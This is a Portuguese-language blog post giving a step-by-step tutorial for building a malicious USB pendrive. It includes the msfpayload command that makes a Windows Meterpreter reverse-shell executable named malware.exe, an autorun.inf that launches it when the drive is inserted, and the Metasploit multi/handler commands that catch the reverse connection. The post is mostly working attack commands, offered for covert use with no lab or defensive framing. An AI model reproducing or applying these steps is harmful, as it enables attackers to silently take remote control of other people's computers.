WWW.FLEPS.COM.BR

ATAQUE USB COM METASPLOIT

By admin at 2019-01-02 • 0 colecionador • 931 visualizações de página

Iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma conexão reversa com o Meterpreter. A idéia é gerar, com o Metasploit, um arquivo executável com um payload para gerar uma conexão reversa ao conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal Customizer.

Gerar o payload com o Metasploit:
Vamos criar um executável com uma conexão reversa do Meterpreter:
msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X >malware.exe

Criar nossa ISO:
Uma vez que tenhamos baixado o Universal Customizer, copiamos o arquivo malware.exe para o diretório “U3CUSTOM” e criamos o arquivo “autorun.inf” com o seguinte conteúdo: [AutoRun]open=malware.exe
Após isso, executamos o “ISOCreate.cmd” e dentro do diretório “BIN” será criada nossa ISO com o nome “U3CUSTOM.ISO”. Se não criarmos nossa ISO , o Universal Customizer utilizará a ISO “U3CUSTOM.ISO” que já vem dentro do pacote, com uma versão feita por Hacksaw.

Gravar a ISO:
Iniciamos o Universal Customizer e vamos seguindo os passos:
Ao finalizar, retiramos o pendrive, e quando voltarmos a conectá-lo já teremos nosso payload sendo executado.

Aguardando a conexão reversa:
Para finalizar, devemos deixar o meterpreter “escutando” à espera da conexão reversa que será feita pelo payload gravado no pendrive: ./msfconsoleuse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 1.1.1.1set LPORT 443set ExitOnSession falseexploit -j

É isso pessoal o processo é basicamente a criação de uma backdoor coloca-la no pendrive e criar o arquivo “autorun.inf” colocar o meterpreter em modo escuta e aguardar.


Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: